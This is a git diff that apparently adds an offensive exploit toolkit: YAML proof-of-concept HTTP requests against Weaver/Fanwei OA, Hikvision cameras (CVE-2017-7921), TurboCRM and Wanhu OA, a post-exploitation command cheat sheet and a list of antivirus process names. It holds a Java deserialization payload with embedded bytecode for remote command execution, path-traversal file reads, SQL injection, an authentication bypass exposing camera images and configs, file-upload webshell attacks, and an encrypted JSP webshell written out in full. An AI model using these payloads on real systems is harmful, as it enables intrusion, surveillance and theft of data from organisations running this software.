diff --git a/poc/fanwei/WorkflowServiceXml.yml b/poc/fanwei/WorkflowServiceXml.yml new file mode 100644 index 0000000..bbd4096 --- /dev/null +++ b/poc/fanwei/WorkflowServiceXml.yml @@ -0,0 +1,30 @@ +method: POST +url: $ +tlsversion: HTTP/1.1 +uri: /services%20/WorkflowServiceXml +param: +data: ' + + + +<java.util.PriorityQueue serialization='custom'> <unserializable-parents/> <java.util.PriorityQueue> <default> <size>2</size> <comparator class='javafx.collections.ObservableList$1'/> </default> <int>3</int> <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data> <dataHandler> <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'> <contentType>text/plain</contentType> <is class='java.io.SequenceInputStream'> <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'> <iterator class='com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator'> <names class='java.util.AbstractList$Itr'> <cursor>0</cursor> <lastRet>-1</lastRet> <expectedModCount>0</expectedModCount> <outer-class class='java.util.Arrays$ArrayList'> <a class='string-array'> <string>$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dV$d9W$TW$i$fe$G$C3$M$c3b$Qa$5c$b1u$J$w$c1$ee$V$a9$VA$5c$g$d0$g$8a$Vm$ed0$5c$60$m$cc$c4$c9D$90$$v$b3$9b$ddwk$b7$97$k_$db$3eDO$7b$da$d3$87$be$d8S$l$da$3f$a8$f6$bb$93$40$J$89$da$9c$93$7b$e7$fe$eeo$bb$bf$ef$bb$bf$99$3f$fe$f9$e9W$A$f7$e3$5b$j$G$S$3a$G0$a8$e1$88$9c$8f$eax$i$c7$e4$90$d40$a4$e3$J$Mk8$ae$e2I$j$3aN$a8$Y$d1q$S$a7$a4$d9SR$f2$b4$86$d3r$7eF$87$85Q9$d8$g$c6T$I$N$e3$3a$9a1$a1aR$85$a3aJ$c5$b4$8e$Uft$ac$81$ab$c1$93sZ$Og$e4$e0k$c8$a8$It$dc$8d$ac$8a$b3$K$aa$bb$j$d7$J$f6$u$a8$8c$b5$P$x$88$f4zcBAC$c2q$c5$60vfT$f8C$d6h$8a$92h$c2$b3$ad$d4$b0$e5$3br$bd$m$M$ect$c6$b3$a7E$40$fd$e9$de$945$3f$af$60Eb$ca$3aku$a6$yw$a2$93$a2Lf7$V$tD$d0$9b$f5$7d$e1$G$c7$c4$99$ac$c8$E$D$KV$_Q$f4$c5xJ$d8A$e7$80$I$s$bd1Z$d4$dbE$ea2$81$ff$b4$8f$8cNQ$99Z$ca$b8$C$b3$8c$9b$7eG$a4$a4$X$cd$X$99$b4$e7f$98$ab$ce$U$8e$fbN$m$7c$86Vf$V4$e6$ed$i$af3$_$de$9d$d79$u$ac$b1P$a7$d2$9e$Z$x$O$9b$M$7c$c7$9d$90a3$K$9a$f2$h$d9$c0Iu$sm$cbuC$P$K$p5$_1$d9$3fg$8bt$e0x$$$f7$o$c1$a4C$c3$9a$c4x$d6$9e$3e$e7e$v$aaK$G$96$3d$3d$60$a5$c3$82$S$Q$S$40$c5$y$e1W1Gt$J$v$f1$q$60$cc$z$e9e$7d$5b$f4$3b$b2$f0F$c1E$5cF2$b0$F$5bU$9c30$8fg$Z$868$d9$G$9e$c3$f3$w$5e0p$k$_$gx$J$_$x$d8j$7b3q$db$ca$da$93$5e$dc$V$c1$ac$e7O$c7SN$s$Qn$7c$c8N$t$XqT$f1$8a$81Wq$81P$96$c0Fj$yC$d7$c0kx$9d$d5$5c$8e$O$8fa$e0$N$bci$e0$z$5c4$f06$$$d2$f6$f4$C$k$fd$96$cd2$hx$H$ef$f2$a4$G$de$c3$fb$G$3e$c0$87$y$cf$oN$qA1B$KbioV$f8b$acm$f4$5c$5b$da$L$ac$m$e3$b5$95$fd$Z$f8$I$l$e7$9d$e5$B$z$ca0$P$a4$C5$efc$tOZ$C$a6$8aO$M$7c$8a$cfdu$3fWPq$aa$c7$c0$r$7ca$e02$be4$f0$V$beV$A$b2$a0$M$d4$G$be$c1V$3a$_$60$a4$a0$f5V$3cW$d0r$L$ee$$d$U$ee$i$cb$ba$813S$e0$f0$e2$a29$d6$9e$u$d1$914$Ts$c2$s$da$b1R$e6$$58$ea$7b$b6$I$_$e7$92$c2$MM$fa$ac$WyY$b8$7d$L$eb$95E$b1$f2RZ6K$7exn$m$e6$82$90$L$J$__j$b3H$7d$c9$96$b4$v$bbA$a8R$7c$I$r$K6$df$n$f7$85$b6$o$e1$5d$a8$e4$de26$tKl$dao$d7s$aa$j$f7$ac7$cd$d2$ee$8a$956$9b$93$a5$a2$f6r$zI$935$c9$l$a3$a9$b4$M$f2$ceS$n$99M$L$df$cek5r$dd$t$b8$m$af$L$d8w$dc$e1$fc$cb$db$5c$5dF$E$3d$b6$84$d3$J$fbr$q6$o$9by$r$3d$x$d8R$e60e3$af$9a$95$b7L$S$abL$f4$e1$oF$W$c8$c3$h$ca$Q$87$dct6$a0$9e$b0fH$e8$853$f3$d6$$$d9$a0$fb$d6X$d9$N$e9$d9$c8fD$9fH93$f9$5b$7e$h$ea$$k$b7$ea$a4$95$Z$q$fb$c2$d7$d7$I$P$ee$86$8bb$ba$$$b6$ed$864$l$82$b0$e5$O$f9$96$z$b0$R$9b$f9$82$95$3fvn$d9E9$c6$80$8avT$a3$96$d2$bf$b7$5d$85r$N$V$d1$ca$i$o$c7$af$a1$w$87$ea$a8$9a$83$96$d8$k$ad$a9$fc$Fz$O$b5$D$3b$U$3e$Z9$d4$Nv$e4P$9fCC$b41$87$V$5d$R3$S$c9$njF$um$ea$aa2i$5b$l$5dY0$ea$aa6$ab$cd$aa$82$ddoh$eeRM5$ba$w$87$W$e9$o$da$g$a1$d6$89$ca$a8$99$94$aa$9a$a9uP$60P$b0$3a$Z$aa$9b$5d5$3fc$cd$J$sf$d60$b1$i$d6$5e$c5$ba$e8$fa$i6t$e9$a6j2$40$db$r$d4$cay$e3$VTE$ef$a2$df$x2$e7$i6$fd$c0$TFp$j$7f$f2$D$a0$S$ed$3c$e3$m$9a8$g$94$d6$a3$O$N0$d1$88MX$818$a2$e8$e6$de$3e$ac$c4a$7ea$8c$60$V$a6$d0$823h$c5$Fj$5d$c2j$fc$c8$_$8a$ebXOokq$D$eb$f0$X6$60$h$bd$cd$d3$9f$89$ef$b1$j$3b$Yo$T$beC$H$fdU$f0$7f$Z$9d$d8$c9$c8$dd$ec$fc$f7$e0$5eF$3d$cc7$d4$7d$94U1$82$c7O$a58k$3f$85$d3x$A$PBe$a4$3e$3cD$99$c6x$3b$f10v$a1$86Q$5b$d0$85$dd$fc$g$baA$fbn$3c$c2$Y$c4$K$7b$f0$u$e7$bd$fc$3b$88$dc$c4$ef$a8U$d1$a3b$9f$8a$5e$V$7d$w$f6$87$p$9f$fb$c3$f1$80$8a$83P$b8$baI$fb$ff$a1Z$R$ae$O$dcd$a6$b4$ea$91$c3$a1$IM$P3$60$F$k$fb$X$9f$s$83$aa$ec$J$A$A </string> </a> </outer-class> </names> <processorCL class='com.sun.org.apache.bcel.internal.util.ClassLoader'> <parent class='sun.misc.Launcher$ExtClassLoader'> </parent> <package2certs class='hashtable'/> <classes defined-in='java.lang.ClassLoader'/> <defaultDomain> <classloader class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='../..'/> <principals/> <hasAllPerm>false</hasAllPerm> <staticPermissions>false</staticPermissions> <key> </key> </defaultDomain> <domains class="java.util.Collections$SynchronizedSet" serialization="custom"> <java.util.Collections_-SynchronizedCollection> <default> <c class="set"></c> <mutex class="java.util.Collections$SynchronizedSet" reference="../../.."/> </default> </java.util.Collections_-SynchronizedCollection> </domains> <packages/> <nativeLibraries/> <assertionLock class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='..'/> <defaultAssertionStatus>false</defaultAssertionStatus> <classes/> <ignored__packages> <string>java.</string> <string>javax.</string> <string>sun.</string> </ignored__packages> <repository class='com.sun.org.apache.bcel.internal.util.SyntheticRepository'> <__path> <paths/> <class__path>.</class__path> </__path> <__loadedClasses/> </repository> <deferTo class='sun.misc.Launcher$ExtClassLoader' reference='../parent'/> </processorCL> </iterator> <type>KEYS</type> </e> <in class='java.io.ByteArrayInputStream'> <buf></buf> <pos>0</pos> <mark>0</mark> <count>0</count> </in> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data> <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/> </java.util.PriorityQueue> </java.util.PriorityQueue> + 2 + + +' +others: + Upgrade-Insecure-Requests: 1 + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 + Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' + Accept-Language: zh-CN,zh;q=0.9 + Cookie: ecology_JSessionid=aaaZq4kZ8A5s8a400gOHx; JSESSIONID=aaaZq4kZ8A5s8a400gOHx; __randcode__=5673423c-9aa3-4af0-afb1-340bb3538838 + Connection: close + potats0: ipconfig + Content-Type: text/xml;charset=UTF-8 + Content-Length: 36869 +condition: + words: powered by + time: +expinformation: + expname: 泛微命令执行 + expdescribe: 泛微/services%20/WorkflowServiceXml执行命令 diff --git a/poc/fanwei/fileread1.yml b/poc/fanwei/fileread1.yml new file mode 100644 index 0000000..179f590 --- /dev/null +++ b/poc/fanwei/fileread1.yml @@ -0,0 +1,20 @@ +method: GET +url: $ +tlsversion: HTTP/1.1 +uri: /weaver/org.springframework.web.servlet.ResourceServlet +param: resource=/WEB-INF/prop/weaver.properties +data: | + +others: + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 + Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' + Accept-Language: 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' + Accept-Encoding: gzip, deflate + Connection: keep-alive + Upgrade-Insecure-Requests: 1 +condition: + words: ecology.url + time: +expinformation: + expname: 泛微读取文件-1 + expdescribe: 泛微读取文件,/weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/prop/weaver.properties \ No newline at end of file diff --git a/poc/fanwei/fileread2.yml b/poc/fanwei/fileread2.yml new file mode 100644 index 0000000..52941be --- /dev/null +++ b/poc/fanwei/fileread2.yml @@ -0,0 +1,20 @@ +method: GET +url: $ +tlsversion: HTTP/1.1 +uri: /weaver/ln.FileDownload +param: fpath=../ecology/WEB-INF/prop/weaver.properties +data: | + +others: + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 + Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' + Accept-Language: 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' + Accept-Encoding: gzip, deflate + Connection: keep-alive + Upgrade-Insecure-Requests: 1 +condition: + words: ecology.url + time: +expinformation: + expname: 泛微读取文件-2 + expdescribe: 泛微读取文件,/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/prop/weaver.properties \ No newline at end of file diff --git a/poc/fanwei/sqlinject1.yml b/poc/fanwei/sqlinject1.yml new file mode 100644 index 0000000..1c6d07f --- /dev/null +++ b/poc/fanwei/sqlinject1.yml @@ -0,0 +1,21 @@ +method: GET +url: $ +tlsversion: HTTP/1.1 +uri: /js/hrm/getdata.jsp +param: cmd=forgotPasswordCheck&type=1&loginid=sysadmin111111%27%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0aunion+select+ascii(1),%272%27,%273%27,%274%27,%275%27,%276%27+where+%27%27=%27 +data: | + +others: + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 + Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' + Accept-Language: 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' + Accept-Encoding: gzip, deflate + Connection: keep-alive + Upgrade-Insecure-Requests: 1 +condition: + words: > + "id":49 + time: +expinformation: + expname: 泛微注入-2 + expdescribe: 泛微注入,/js/hrm/getdata.jsp \ No newline at end of file diff --git a/poc/hikvision/CVE-2017-7921.yml b/poc/hikvision/CVE-2017-7921.yml new file mode 100644 index 0000000..31245a6 --- /dev/null +++ b/poc/hikvision/CVE-2017-7921.yml @@ -0,0 +1,20 @@ +method: GET +url: $ +tlsversion: HTTP/1.1 +uri: /onvif-http/snapshot +param: auth=YWRtaW46MTEK +data: | + +others: + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 + Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' + Accept-Language: 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' + Accept-Encoding: gzip, deflate + Connection: keep-alive + Upgrade-Insecure-Requests: 1 +condition: + words: Content-Type:image/jpeg + time: +expinformation: + expname: hikvision + expdescribe: hikvision/CVE-2017-7921.yml,返回的为查看的图像(访问该链接可以直接查看海康威视的监控截图/onvif-http/snapshot?auth=YWRtaW46MTEK;访问该链接可以直接查看海康威视的用户列表/Security/users?auth=YWRtaW46MTEK;访问该链接可以直接获取海康威视的配置文件/System/configurationFile?auth=YWRtaW46MTEK) \ No newline at end of file diff --git a/poc/turbocrm/fileread.yml b/poc/turbocrm/fileread.yml new file mode 100644 index 0000000..e98940a --- /dev/null +++ b/poc/turbocrm/fileread.yml @@ -0,0 +1,19 @@ +method: GET +url: $ +tlsversion: HTTP/1.1 +uri: /ajax/getemaildata.php +param: DontCheckLogin=1&filePath=c:/windows/system32/drivers/etc/hosts +data: | + +others: + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 + Accept: text/html,application/xhtml+xml,application/xml;q + Accept-Language: zh-CN,zh;q + Accept-Encoding: gzip, deflate + Upgrade-Insecure-Requests: 1 +condition: + words: Copyright + time: +expinformation: + expname: TurboCRM文件读取 + expdescribe: TurboCRM文件读取,路径为/ajax/getemaildata.php \ No newline at end of file diff --git a/poc/turbocrm/getshell.yml b/poc/turbocrm/getshell.yml new file mode 100644 index 0000000..32ea48a --- /dev/null +++ b/poc/turbocrm/getshell.yml @@ -0,0 +1,35 @@ +method: POST +url: $ +tlsversion: HTTP/1.1 +uri: /ajax/getemaildata.php +param: DontCheckLogin=1 +data: | + -----------------------------344329421119612311021814993770 + Content-Disposition: form-data; name="file"; filename="shell.php " + Content-Type: text/php + + + + -----------------------------344329421119612311021814993770 + Content-Disposition: form-data; name="upload" + + upload + -----------------------------344329421119612311021814993770-- +others: + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 + Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' + Accept-Language: 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' + Accept-Encoding: gzip, deflate + Content-Type: 'multipart/form-data; boundary=---------------------------344329421119612311021814993770' + Content-Length: 386 + Connection: keep-alive + Cookie: 'PHPSESSID=c7vlvgf1hhc8uat6r2nnu57333' + Upgrade-Insecure-Requests: 1 +condition: + words: tmpfile + time: +expinformation: + expname: TurboCRM任意文件上传 + expdescribe: TurboCRM任意文件上传,路径为返回的tmpfile/mh70D7.tmp.mht换为tmpfile/upd70D6.tmp.php \ No newline at end of file diff --git a/poc/wanhu/frontgetshell.yml b/poc/wanhu/frontgetshell.yml new file mode 100644 index 0000000..e50014e --- /dev/null +++ b/poc/wanhu/frontgetshell.yml @@ -0,0 +1,35 @@ +method: POST +url: $ +tlsversion: HTTP/1.1 +uri: /defaultroot/officeserverservlet +param: +data: | + DBSTEP V3.0 185 0 611 + DBSTEP=REJTVEVQ + OPTION=U0FWRUZJTEU= + RECORDID= + firstFilesize=dHJ1ZQ== + isDoc=dHJ1ZQ== + moduleType=aW5mb3JtYXRpb24= + FILETYPE=Ly4uLy4uL3B1YmxpYy9lZGl0L3RhMi5qc3A= + isViewOld=MQ== + + <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%> + <%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%> + <%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k); + Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES")); + new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%> +others: + User-Agent: Go-http-client/1.1 + Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3' + Accept-Encoding: gzip, deflate + Accept-Language: 'zh-CN,zh;q=0.9,en;q=0.8' + Connection: close + Upgrade-Insecure-Requests: 1 + Content-Length: 790 +condition: + words: DBSTEP + time: +expinformation: + expname: 万户getshell + expdescribe: 万户getshell,可能需要代理模式下进行使用,默认冰蝎马,密码为rebeyond \ No newline at end of file diff --git a/poc2jar.jar b/poc2jar.jar new file mode 100644 index 0000000..82435bf Binary files /dev/null and b/poc2jar.jar differ diff --git a/property/cmdlists.txt b/property/cmdlists.txt new file mode 100644 index 0000000..b86b6a9 --- /dev/null +++ b/property/cmdlists.txt @@ -0,0 +1,21 @@ +windows查找文件::::dir c:\ /s /b | find "win.ini"、dir c:\ /s /b | find "navicat.exe"、dir c:\ /s /b | find "finalshell.exe" + +linux查找文件::::find / -name passwd + +windows写文件::::echo ^<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%^> >> C:/x/x.jsp、、echo ^<%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%^> >> C:/x/x.jsp、、echo ^<%if (request.getMethod().equals("POST")){String k="af8a6a25cc5bfb73";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%^> >> C:/x/x.jsp + +linux写文件::::echo xxxxx== |base64 -d > /var/www/html/1.jsp + +获取操作系统命令::::wmic OS get Caption,CSDVersion,OSArchitecture,Version + +主机收集::::查看rdp链接记录 cmdkey /list、查看dns记录 ipconfig /displaydns 、查看arp记录 arp -a + +根据进程查找进程文件::::wmic process where name="xxxx.exe" get processid,executablepath,name、wmic process where name="chrome.exe" list full + +查看当前系统是否有屏保保护,延迟是多少::::wmic desktop get screensaversecure,screensavertimeout + +查看当前系统是否是VMWARE::::wmic bios list full | find /i "vmware" + +显示系统中的曾经连接过的无线密码::::netsh wlan show profiles + +windows常用的系统变量::::查看当前用户目录%HOMEPATH、查看当前目录%CD%、列出用户共享主目录的网络路径%HOMESHARE%、 列出有效的当前登录会话的域名控制器名、列出了可执行文件的搜索路径%Path%、列出了处理器的芯片架构%PROCESSOR_ARCHITECTURE%、列出了Program Files文件夹的路径%ProgramFiles%、列出了当前登录的用户可用应用程序的默认临时目录%TEMP% and %TMP%、列出了当前登录的用户可用应用程序的默认临时目录%TEMP% and %TMP%、列出了包含用户帐号的域的名字%USERDOMAIN%、列出操作系统目录的位置%WINDIR%、返回“所有用户”配置文件的位置%ALLUSERSPROFILE%、返回处理器数目%NUMBER_OF_PROCESSORS% \ No newline at end of file diff --git a/property/config.properties b/property/config.properties new file mode 100644 index 0000000..0676474 --- /dev/null +++ b/property/config.properties @@ -0,0 +1 @@ +pythonpath=python \ No newline at end of file diff --git a/property/exetest.txt b/property/exetest.txt new file mode 100644 index 0000000..f821842 --- /dev/null +++ b/property/exetest.txt @@ -0,0 +1,530 @@ +"360tray.exe": "360安全卫士-实时保护", +"360safe.exe": "360安全卫士-主程序", +"ZhuDongFangYu.exe": "360安全卫士-主动防御", +"360sd.exe": "360杀毒", +"a2guard.exe": "a-squared杀毒", +"ad-watch.exe": "Lavasoft杀毒", +"cleaner8.exe": "The Cleaner杀毒", +"vba32lder.exe": "vb32杀毒", +"MongoosaGUI.exe": "Mongoosa杀毒", +"CorantiControlCenter32.exe": "Coranti2012杀毒", +"F-PROT.exe": "F-Prot AntiVirus", +"CMCTrayIcon.exe": "CMC杀毒", +"K7TSecurity.exe": "K7杀毒", +"UnThreat.exe": "UnThreat杀毒", +"CKSoftShiedAntivirus4.exe": "Shield Antivirus杀毒", +"AVWatchService.exe": "VIRUSfighter杀毒", +"ArcaTasksService.exe": "ArcaVir杀毒", +"iptray.exe": "Immunet杀毒", +"PSafeSysTray.exe": "PSafe杀毒", +"nspupsvc.exe": "nProtect杀毒", +"SpywareTerminatorShield.exe": "SpywareTerminator反间谍软件", +"BKavService.exe": "Bkav杀毒", +"MsMpEng.exe": "Microsoft Security Essentials", +"SBAMSvc.exe": "VIPRE", +"ccSvcHst.exe": "Norton杀毒", +"f-secure.exe": "冰岛", +"avp.exe": "Kaspersky", +"KvMonXP.exe": "江民杀毒", +"RavMonD.exe": "瑞星杀毒", +"Mcshield.exe": "McAfee", +"Tbmon.exe": "McAfee", +"Frameworkservice.exe": "McAfee", +"egui.exe": "ESET NOD32", +"ekrn.exe": "ESET NOD32", +"eguiProxy.exe": "ESET NOD32", +"kxetray.exe": "金山毒霸", +"knsdtray.exe": "可牛杀毒", +"TMBMSRV.exe": "趋势杀毒", +"avcenter.exe": "Avira(小红伞)", +"avguard.exe": "Avira(小红伞)", +"avgnt.exe": "Avira(小红伞)", +"sched.exe": "Avira(小红伞)", +"ashDisp.exe": "Avast网络安全", +"rtvscan.exe": "诺顿杀毒", +"ccapp.exe": "SymantecNorton", +"NPFMntor.exe": "Norton杀毒软件", +"ccSetMgr.exe": "赛门铁克", +"ccRegVfy.exe": "Norton杀毒软件", +"ksafe.exe": "金山卫士", +"QQPCRTP.exe": "QQ电脑管家", +"avgwdsvc.exe": "AVG杀毒", +"QUHLPSVC.exe": "QUICK HEAL杀毒", +"mssecess.exe": "微软杀毒", +"SavProgress.exe": "Sophos杀毒", +"SophosUI.exe": "Sophos杀毒", +"SophosFS.exe": "Sophos杀毒", +"SophosHealth.exe": "Sophos杀毒", +"SophosSafestore64.exe": "Sophos杀毒", +"SophosCleanM.exe": "Sophos杀毒", +"fsavgui.exe": "F-Secure杀毒", +"vsserv.exe": "比特梵德", +"remupd.exe": "熊猫卫士", +"FortiTray.exe": "飞塔", +"safedog.exe": "安全狗", +"parmor.exe": "木马克星", +"Iparmor.exe.exe": "木马克星", +"beikesan.exe": "贝壳云安全", +"KSWebShield.exe": "金山网盾", +"TrojanHunter.exe": "木马猎手", +"GG.exe": "巨盾网游安全盾", +"adam.exe": "绿鹰安全精灵", +"AST.exe": "超级巡警", +"ananwidget.exe": "墨者安全专家", +"AVK.exe": "AntiVirusKit", +"avg.exe": "AVG Anti-Virus", +"spidernt.exe": "Dr.web", +"avgaurd.exe": "Avira Antivir", +"vsmon.exe": "Zone Alarm", +"cpf.exe": "Comodo", +"outpost.exe": "Outpost Firewall", +"rfwmain.exe": "瑞星防火墙", +"kpfwtray.exe": "金山网镖", +"FYFireWall.exe": "风云防火墙", +"MPMon.exe": "微点主动防御", +"pfw.exe": "天网防火墙", +"BaiduSdSvc.exe": "百度杀毒-服务进程", +"BaiduSdTray.exe": "百度杀毒-托盘进程", +"BaiduSd.exe": "百度杀毒-主程序", +"SafeDogGuardCenter.exe": "安全狗", +"safedogupdatecenter.exe": "安全狗", +"safedogguardcenter.exe": "安全狗", +"SafeDogSiteIIS.exe": "安全狗", +"SafeDogTray.exe": "安全狗", +"SafeDogServerUI.exe": "安全狗", +"D_Safe_Manage.exe": "D盾", +"d_manage.exe": "D盾", +"yunsuo_agent_service.exe": "云锁", +"yunsuo_agent_daemon.exe": "云锁", +"HwsPanel.exe": "护卫神", +"hws_ui.exe": "护卫神", +"hws.exe": "护卫神", +"hwsd.exe": "护卫神", +"hipstray.exe": "火绒", +"wsctrl.exe": "火绒", +"usysdiag.exe": "火绒", +"SPHINX.exe": "SPHINX防火墙", +"bddownloader.exe": "百度卫士", +"baiduansvx.exe": "百度卫士-主进程", +"AvastUI.exe": "Avast!5主程序", +"emet_agent.exe": "EMET", +"emet_service.exe": "EMET", +"firesvc.exe": "McAfee", +"firetray.exe": "McAfee", +"hipsvc.exe": "McAfee", +"mfevtps.exe": "McAfee", +"mcafeefire.exe": "McAfee", +"scan32.exe": "McAfee", +"shstat.exe": "McAfee", +"vstskmgr.exe": "McAfee", +"engineserver.exe": "McAfee", +"mfeann.exe": "McAfee", +"mcscript.exe": "McAfee", +"updaterui.exe": "McAfee", +"udaterui.exe": "McAfee", +"naprdmgr.exe": "McAfee", +"cleanup.exe": "McAfee", +"cmdagent.exe": "McAfee", +"frminst.exe": "McAfee", +"mcscript_inuse.exe": "McAfee", +"mctray.exe": "McAfee", +"_avp32.exe": "卡巴斯基", +"_avpcc.exe": "卡巴斯基", +"_avpm.exe": "卡巴斯基", +"aAvgApi.exe": "AVG", +"ackwin32.exe": "已知杀软进程,名称暂未收录", +"alertsvc.exe": "Norton AntiVirus", +"alogserv.exe": "McAfee VirusScan", +"anti-trojan.exe": "Anti-Trojan Elite", +"arr.exe": "Application Request Route", +"atguard.exe": "AntiVir", +"atupdater.exe": "已知杀软进程,名称暂未收录", +"atwatch.exe": "Mustek", +"au.exe": "NSIS", +"aupdate.exe": "Symantec", +"auto-protect.nav80try.exe": "已知杀软进程,名称暂未收录", +"autodown.exe": "AntiVirus AutoUpdater", +"avconsol.exe": 